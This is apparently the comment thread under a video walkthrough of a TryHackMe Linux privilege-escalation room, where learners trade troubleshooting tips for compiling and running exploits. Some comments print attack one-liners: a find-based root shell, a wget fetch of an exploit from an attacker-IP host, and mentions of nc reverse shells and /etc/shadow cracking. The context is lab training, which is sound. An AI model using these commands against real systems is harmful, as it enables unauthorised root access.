Agreed love these videos. For anyone confused about the errors during the section that starts around 40 mins in, they are two-fold. First off, the c code wasn't written wrong, he forgot to compile it. C code needs compiled before it can be run. That said, the machine can't use the gcc command anyways, so it wouldn't have mattered. Second off, he was trying to run a python3 code with the python command. Instead of running "python thm.py", it should have been "python3 thm.py". Now that said, we actually can't run thm.py bc the code is incorrectly written and we don't have access to rewrite it. So we needed to use code for the "thm" binary that doesn't need compiled (bash, python, etc.) and we need to run ./test since thm.py wont work.
your videos are so helpful, you have no idea, for someone trying to break into the field, and seeing someone struggle with these exercises even if already working for a while in the industry is reassuring! showing the whole process of problem-solving is helpful too. Definitely going to subscribe in order to access your notes too! keep it up man
@@shadajjoshi3740 using -static option means that we want our executable to be static (non-dynamic) meaning that it will not require any additional libraries and can run on its own when executed and these libraries are not present on the machine we want to execute them on
FYI, if you are using the attack machine provided by THM you will not be able to gcc the exploit to compiled file on your attach machine, however accessing the target from browser and saving the exploit /tmp then gcc then ./exploit will result in successful privilege escalation
followed your video almost all the way! There are several times I got stuck and you jumped me in the right direction. I did not watch the capstone part though. I wanted to do that challenge by myself. I got it! Both flags!! Thank you for your help :)
Hi! I am doing the room and in the Task 6: Sudo I can't do "sudo -l". It asks me the password and say "Sorry, user karen may not run sudo on wade7363." Do you know how to do it?
That blew my mind that you used nano to PrivEsc. There are so many unique and creative ways to move around a system I feel like the options are nearly limitless. The amount there is to learn feels infinite.
I did the Last (Capstone) Challenge by switching to user missy and from there escalate my privilege through find command to spawn shell as root. From there do what needs to be done edit: I noticed you dont need to be root, but yeah I like freedom xD
on the capstone challenge missy have sudo permission on "find" and we can easily gain root shell with this "./find . -exec /bin/sh -p \; -quit" command
You are welcome ! If you meant the notes, they can be accessed through the channel membership or through this link buymeacoffee.com/notescatalog/extras
waht can i do if my kali linux making compile this "ofc" file using libc version 2.34 and target linux system got installer oleder version (2.19) and i recieve error?
To avoid compatibility issues, try compiling the code directly on the SSH machine where it will be executed. This ensures that all binaries and libraries are aligned with the system’s GCC version and libraries.
Thank you for a great video! 46:14 -> The Path-based escalation one I think it didn't work because your file was the source file and the test file might have expected a compiled binary?
Yeah, right. You have to compile it first. It's also explained in this THM Chapter. But i ended up using Python, cause it was faster for me. But his method was even faster :D
Ive had so many steps fail on these tasks. When I execute a command or follow the steps, some just fail. Its like the wrong vm is loading for the task.
At the NFS part, after compiling and going to the target machine i get the error: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./code) Why do i get this?
@@boyqb but what about real life situation, i am unable to solve it and only option seems to download old version of Ubuntu and then compile the c code to be used at attack machine
I appreciate your videos, I'm not sure why i can never ssh into try hack me from my kali vm terminal... either way it won't stop me from completing my training and getting my comp tia certificate!
Hi there. How did you knew that flag3 is located in /home/ubuntu ? From my understanding.. we didn't had root privileges for search, and the solution would be to create a new user with root privileges. Am I wrong?
Hello great video, I learned a lot, you have already helped me a lot in several rooms at THM, I would like to ask where do you get these ready-made scripts from, if they are yours and they are somewhere, or if it is from a site open for use?
took me 9 hours watching the video and trying it by myself as i dont know anything about priv esc.the only part i didnt understand is the privilege escalation:PATH
Nice video bro! not sure what "thm.py" is about in task 10, because "test" seems like a C-compiled executable that does the job, but python is only interpreted :p
I really appreciate your hard work on this video. I have a doubt: when you cracked missy's hash, how did you do it? I created a file named "missy" just like yours, and then I put the hash in it. I saved and closed the file, and finally, I used the same "john" command. However, my output was "0 password hashes craked, 1 left", Can you help me? :(
I did the same thing with the capstone where i used the gtfo stuff to read it and didn't bother needing to switch to the root user (assume this is all that's expected)
Hi Motasem! I'm very thankful for your walkthroughts - they brings me a lot of knowledge. I have one question for you. In this task about Privilage Escalation NFS I've done everything like you show in movie above but on finish I saw an error about conflicts in libriaries. I think kali linux which I use had higher version of gcc than target machine. So I can't finish this task my own because targeted machine don't want open te code file. How we can handle this problem in this task and in real situation when targeted machine had other version of libraries and didn't open a file with code?
thank you!!!! it's really helpful. I saw the comment about 49:38, the file failed to execute because it need to be c/c++. I wonder how to determine the file need to be c/c++ or not.
Hello friend, thank you very much for your videos, I wanted to ask you, I have seen in some videos that you use a note book where you have some saved commands, also reverse shell codes. Where can I get that notebook? is it public or paid?
Hi Thank you so much for all your help and investment! very appreciate ! Question: Is there a situation you can compress the obsidian collection, and share it with us?
Notes are part of my channel membership. Link Below ua-cam.com/channels/NSdU_1ehXtGclimTVckHmQ.htmljoin Note that notes are only available online to preserve copy-rights. Also Notes are always updated with new content as well that's why one needs to subscribe for continuous access. FYI
Hello, you can subscribe to the channel membership tier 2 to get access to all the notes, link below ua-cam.com/channels/NSdU_1ehXtGclimTVckHmQ.htmljoin Or if you are interested in one subject among the others, you can pay for one time. The notes that are available for one time purchase can be found below buymeacoffee.com/notescatalog/extras
Hi, @9:31 unable to establish Privilege escalation due to GCC version mis-match mine is 2.37 but supported is 2.19 ... Unable to step down the version , Pls Suggest
To avoid compatibility issues, try compiling the code directly on the SSH machine where it will be executed. This ensures that all binaries and libraries are aligned with the system’s GCC version and libraries.
Hello, you can subscribe to the channel membership tier 2 to get access to all the notes, link below ua-cam.com/channels/NSdU_1ehXtGclimTVckHmQ.htmljoin Or if you are interested in one subject among the others, you can pay for one time. The notes that are available for one time purchase can be found below motasem-notes.net/
Great video Mate, I got all flags. But can you try to escalate yourself to root in this machine. I tried every method but i couldn't. Can you try to get yourself as root?..
Thanks for the great video, really learnt a lot following along to this. The only trouble I had was in Task 7 when trying to execute the Base64 SUID exploit. I couldn't install the exploit on the machine as I didn't have sudo priveleges (I was trying to get them!). You skipped over it a bit in your video(19:35) by just saying 'download it'. When I tried to do this logged in is as the 'Karen' user, it wouldn't let me install it. I am a complete noob to all this so have no idea what I was doing wrong?
You didn't have write permissions for whatever folder you were trying to download to, make sure that you compile the script on your machine, then on your ssh client, cd into /tmp and run "wget (attacker_ip):(python_httpserver_port)/script"
I can't get root when I have to change the backup.sh file and I intercept the connection I keep getting into karen again it won't make me root and I follow everything to the T so I'm not sure why its not giving me root access through nc
Nice vid man. I like how you show the struggles of the process. It's somewhat of a relief that others have gone thru similar issues.
Yes indeed nice video
Agreed love these videos. For anyone confused about the errors during the section that starts around 40 mins in, they are two-fold. First off, the c code wasn't written wrong, he forgot to compile it. C code needs compiled before it can be run. That said, the machine can't use the gcc command anyways, so it wouldn't have mattered. Second off, he was trying to run a python3 code with the python command. Instead of running "python thm.py", it should have been "python3 thm.py". Now that said, we actually can't run thm.py bc the code is incorrectly written and we don't have access to rewrite it. So we needed to use code for the "thm" binary that doesn't need compiled (bash, python, etc.) and we need to run ./test since thm.py wont work.
your videos are so helpful, you have no idea, for someone trying to break into the field, and seeing someone struggle with these exercises even if already working for a while in the industry is reassuring! showing the whole process of problem-solving is helpful too. Definitely going to subscribe in order to access your notes too! keep it up man
On task five, in order to get the exploit to run, add the -static flag when compiling with gcc if you have a GLIBC version issue.
OH MY GOD, Thank you) Finnally found it)
by the way add -static at the end of a command, after ofc.
what is the difference between -static compiling and normal compiling ?
@@shadajjoshi3740 using -static option means that we want our executable to be static (non-dynamic) meaning that it will not require any additional libraries and can run on its own when executed and these libraries are not present on the machine we want to execute them on
Thank you so much. I had this same issue. You are a LEGEND!!
FYI, if you are using the attack machine provided by THM you will not be able to gcc the exploit to compiled file on your attach machine, however accessing the target from browser and saving the exploit /tmp then gcc then ./exploit will result in successful privilege escalation
Thanks!!!
Good information, thank you!!
Sorry,what do you mean by accessing the target from browser ,what is the command please.
Thank you so much for your videos. I cannot tell you how much your explanations have helped me. You're a natural teacher, I appreciate you!
Great walkthrough!
You are very comfortable to listen to and do a great job! Keep it up please :)
followed your video almost all the way! There are several times I got stuck and you jumped me in the right direction. I did not watch the capstone part though. I wanted to do that challenge by myself. I got it! Both flags!! Thank you for your help :)
Hi! I am doing the room and in the Task 6: Sudo I can't do "sudo -l". It asks me the password and say "Sorry, user karen may not run sudo on wade7363." Do you know how to do it?
Bro thank you for being on UA-cam, i learnt so much from you. I will try to practice more. You earned yourself a sup !
Could have never completed this without you thank you so much
Very good video, thank you very much, I also found that if you crack the root hash you can skip the following steps!!
good stuff! 10/10 video, straight to the point. learned a lot, thank youuu!!!!!!
Thanks for your help man I really like your videos when I need help, straight to the point.
Excellent video my friend. You are a great teacher. Thank you for taking the time to make these videos.
Really nice tutorial. I have been able to understand not only how to complete the tasks but the process itself. Thanks !!!
That blew my mind that you used nano to PrivEsc. There are so many unique and creative ways to move around a system I feel like the options are nearly limitless. The amount there is to learn feels infinite.
31:51 U sinking? All I could hear was a mouth full of water bubbles hahaa Your video helps me a lot bro, Keep it up! Thanks so much!
I did the Last (Capstone) Challenge by switching to user missy and from there escalate my privilege through find command to spawn shell as root. From there do what needs to be done
edit: I noticed you dont need to be root, but yeah I like freedom xD
Excellent working ! thanks for the video :) appreciate to combine all the tasks in single video
very clear thanks, will definitely use your cheatsheet for my oscp in like 3-4 months
Mail me the sheet
Where i can found the cheatsheet ? Can you send me please.
Think you just needed to compile the C code for the path exploit. Great vid.
Thanks a lot for your help. I feel like this section privilege escalation was a jump on tryhackme
Awesome walkthrough, 10/10, thanks a lot
Thank you bro, i did the same steps on crontab, and i was wonder why i didn't get the reverse shell, i forget the chmod +x, thanks bro
Long story short, really helpful vid. Thanks for that!
Excellent walk-through, many thanks for your help, and all the knowledge you share 🙏
on the capstone challenge missy have sudo permission on "find" and we can easily gain root shell with this "./find . -exec /bin/sh -p \; -quit" command
In this class, some things I understood and others I didn't.
Friend, please make more difficult ctfs 🙏🙏🙏🙏🙏
Thank you! This is a great help! Please, let me know what resource did you use on 33 min 42sec with all this helpful stuff?
You are welcome ! If you meant the notes, they can be accessed through the channel membership or through this link
buymeacoffee.com/notescatalog/extras
waht can i do if my kali linux making compile this "ofc" file using libc version 2.34 and target linux system got installer oleder version (2.19) and i recieve error?
To avoid compatibility issues, try compiling the code directly on the SSH machine where it will be executed. This ensures that all binaries and libraries are aligned with the system’s GCC version and libraries.
straight to the point, very clear ...thank you a lot
Thank you for a great video!
46:14 -> The Path-based escalation one
I think it didn't work because your file was the source file and the test file might have expected a compiled binary?
thats a C code we have to use python code in /tmp/thm
Yeah, right. You have to compile it first. It's also explained in this THM Chapter.
But i ended up using Python, cause it was faster for me. But his method was even faster :D
you are awesome with a clear voice, thanks a lot.
Thankyou so much Sir...this video helps me a lot 🙂❤️
Great video, but PLEASE USE CNTRL + L next time for cleaning up terminal.
Did this before your video but thanks.Linux privesc was most hard for me.
Ive had so many steps fail on these tasks. When I execute a command or follow the steps, some just fail. Its like the wrong vm is loading for the task.
Thanks Motasem for sharing your knowledge, amazing job!!!
At the NFS part, after compiling and going to the target machine i get the error: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./code)
Why do i get this?
i have the same error, when i execute the "code" in the target machine get the error that AV says. how can i fix it?
me too
i solved the problem, use try hack me's attack machine
@@boyqb but what about real life situation, i am unable to solve it and only option seems to download old version of Ubuntu and then compile the c code to be used at attack machine
I appreciate your videos, I'm not sure why i can never ssh into try hack me from my kali vm terminal... either way it won't stop me from completing my training and getting my comp tia certificate!
Is it possible to get a copy of your notes library? It is quite extensive. I am working to build my own, but i am a newbie in the field.
Hi there. How did you knew that flag3 is located in /home/ubuntu ? From my understanding.. we didn't had root privileges for search, and the solution would be to create a new user with root privileges. Am I wrong?
7:04 compiling issue - implicit declaration of function
Thanks man, this video was a big help!
This was really helpful. Thanks so much!
Which version of Kali is this? 🐉👨💻
Because it didn't work with the current version of 2024...
you are such a life saver. Thank you for all the knowledge bombs!
Hello great video, I learned a lot, you have already helped me a lot in several rooms at THM, I would like to ask where do you get these ready-made scripts from, if they are yours and they are somewhere, or if it is from a site open for use?
Hello, Notes are part of channel membership tier 2
for task 10.2 the thm file should have "cat /home/matt/flag6.txt" so when you run the test file it would read the flag file.
loved it man , nicely explained
Thank you very much, one of the best tutorials available.
Hey ! Thanks for you help. - Your note document do you share that, for quick access to commands?
Of course, check this out
buymeacoffee.com/notescatalog/extras
Thank you very much ! Your videos are very helpful!
I think the c file wasn't working is because you didn't compile it first ?
How do i easily copy from attacker machine to target and vice versa its eating a lot of my time?
took me 9 hours watching the video and trying it by myself as i dont know anything about priv esc.the only part i didnt understand is the privilege escalation:PATH
thankyou helped a lot
Nice video bro! not sure what "thm.py" is about in task 10, because "test" seems like a C-compiled executable that does the job, but python is only interpreted :p
if you logged in with missy accound and you type sudo -l then you get a message that you can get root permissions with the find suid binary
Thank you , keep up the good work!
I really appreciate your hard work on this video. I have a doubt: when you cracked missy's hash, how did you do it? I created a file named "missy" just like yours, and then I put the hash in it. I saved and closed the file, and finally, I used the same "john" command. However, my output was "0 password hashes craked, 1 left", Can you help me? :(
thank you so much for video I am stuck on crontab from 3 days 😂😂
Same, I couldn't get a reverse shell.
@@ilyasessar7267 yes
Hey man, i got a syntax error (Unterminated quoted string) when executing ./ofc? Kind of strange, i didn't edit it 9:15
From where we can get the Linux Local Privilege Escalation C code?
Is there any way to get those notes that you have so good?
I mean those who leave at minute 33:49 for example :)
Very helpful, thanks amigo 🔥❤
says permission denied when i try to get the first flag1.txt
why I can't able to download from exploit-db website.
Can anyone help me. I am very thankful to you.
i can't download the exploit at 9:02 , i try it with the attackbox and the kali machine but i dont have the permission, someone can explain me why ?
thank you for the precious help, what about that script library? what's your recommendation on constituting scripts library? thank you for your reply
Awesome vid!
Amazing job, thank you!
I did the same thing with the capstone where i used the gtfo stuff to read it and didn't bother needing to switch to the root user (assume this is all that's expected)
Hi Motasem! I'm very thankful for your walkthroughts - they brings me a lot of knowledge. I have one question for you. In this task about Privilage Escalation NFS I've done everything like you show in movie above but on finish I saw an error about conflicts in libriaries. I think kali linux which I use had higher version of gcc than target machine. So I can't finish this task my own because targeted machine don't want open te code file. How we can handle this problem in this task and in real situation when targeted machine had other version of libraries and didn't open a file with code?
I received aswear on discord. I need to use a -static flag when compiling in gcc.
@@kamilnowicki1912 bro ur a life saver, ive been trying to fix this for 1 hour
very good topic but unfortunately sound is very low.. please amend it. ty
thank you!!!! it's really helpful. I saw the comment about 49:38, the file failed to execute because it need to be c/c++. I wonder how to determine the file need to be c/c++ or not.
you're a genius bro thanks a lot for your help
Thank you for this video.
Hello friend, thank you very much for your videos, I wanted to ask you, I have seen in some videos that you use a note book where you have some saved commands, also reverse shell codes. Where can I get that notebook? is it public or paid?
Hi Jorge, the notes are part of channel membership
thank you i will join soon
Hi
Thank you so much for all your help and investment!
very appreciate !
Question: Is there a situation you can compress the obsidian collection, and share it with us?
Notes are part of my channel membership. Link Below
ua-cam.com/channels/NSdU_1ehXtGclimTVckHmQ.htmljoin
Note that notes are only available online to preserve copy-rights.
Also Notes are always updated with new content as well that's why one needs to subscribe for continuous access. FYI
task 11 @ 49:55
task 12 @ 56:10
Plz writeups New room Windows Privilegie Escalation
How to download this cheatsheet to my obsidian? For free of course.
what is the point of reading /etc/shadow when i can brute force ssh directly rather then the hash
Both methods work but /etc/shadow is used most when you already have access and you want to establish persistence.
awesome Motasem Hmdan. i like your video. MASHA ALLAH
Sir i am stuck at NFS
sharedfolder is not populating my created shell c code nothing is synced. what to do?
Hi!
How to get your cheat sheet please?
I would like to know why did you choose base64 ? 19:50
Hello! Any way I can get your Scripts sheet like you are using in the video? Is it through Obsidian?
Hello, you can subscribe to the channel membership tier 2 to get access to all the notes, link below
ua-cam.com/channels/NSdU_1ehXtGclimTVckHmQ.htmljoin
Or if you are interested in one subject among the others, you can pay for one time. The notes that are available for one time purchase can be found below
buymeacoffee.com/notescatalog/extras
You are life saver bro
Hi, @9:31 unable to establish Privilege escalation due to GCC version mis-match mine is 2.37 but supported is 2.19 ...
Unable to step down the version , Pls Suggest
@55:44 , same issue i think updated version of kali gcc don't run on old gcc which is on tryhackme machine
i had the same issue, i just solve it.
when you are about to convert your nfs.c file you need to add -static before it.
gcc -static nfs.c -o nfs
To avoid compatibility issues, try compiling the code directly on the SSH machine where it will be executed. This ensures that all binaries and libraries are aligned with the system’s GCC version and libraries.
Hi motasm, may I now where to purchase your complete notes/cheatsheet. Thank you
Hello, you can subscribe to the channel membership tier 2 to get access to all the notes, link below
ua-cam.com/channels/NSdU_1ehXtGclimTVckHmQ.htmljoin
Or if you are interested in one subject among the others, you can pay for one time. The notes that are available for one time purchase can be found below
motasem-notes.net/
@@MotasemHamdan thank you, your videos are very helpful!
It is a great video! Thank you! Can I acces or download your cheetsheet online somewhere?
Hello, Online notes are part of channel membership. Take a look below
ua-cam.com/channels/NSdU_1ehXtGclimTVckHmQ.htmljoin
Great video Mate, I got all flags. But can you try to escalate yourself to root in this machine. I tried every method but i couldn't. Can you try to get yourself as root?..
I will sure.
@@MotasemHamdan Thanks mate. Hoping to get a small write-up on getting Root-user
why we need to give the thm the suid bit ???
Good video. C ant make it work. My ./nfs file won't run. Gave +s mod. Tried various mods. No joy. Any thoughts?
Compile the code using the attackbox. The exploit for some reason doesn't work if your compiler is newer
Great explanation and thanks for your work. By any chance can i get a copy of your notes plz ?
Thank you. Online access to notes is part of channel membership. Please read the details below
ua-cam.com/channels/NSdU_1ehXtGclimTVckHmQ.htmljoin
thankgoodness, all exploit databases are blocked in my place of learning! bizarre considering we are a cyber lab
Thanks for the great video, really learnt a lot following along to this. The only trouble I had was in Task 7 when trying to execute the Base64 SUID exploit. I couldn't install the exploit on the machine as I didn't have sudo priveleges (I was trying to get them!). You skipped over it a bit in your video(19:35) by just saying 'download it'. When I tried to do this logged in is as the 'Karen' user, it wouldn't let me install it. I am a complete noob to all this so have no idea what I was doing wrong?
You didn't have write permissions for whatever folder you were trying to download to, make sure that you compile the script on your machine, then on your ssh client, cd into /tmp and run "wget (attacker_ip):(python_httpserver_port)/script"
hey can i get all of your scripts from which you choose
I can't get root when I have to change the backup.sh file and I intercept the connection I keep getting into karen again it won't make me root and I follow everything to the T so I'm not sure why its not giving me root access through nc
Make sure that you don't execute backup.sh yourself rather by waiting for the cron job to do it.
@@MotasemHamdan ahh okay I see, that worked finally I been trying to figure this out for so long thank you so much🤙🏿🤙🏿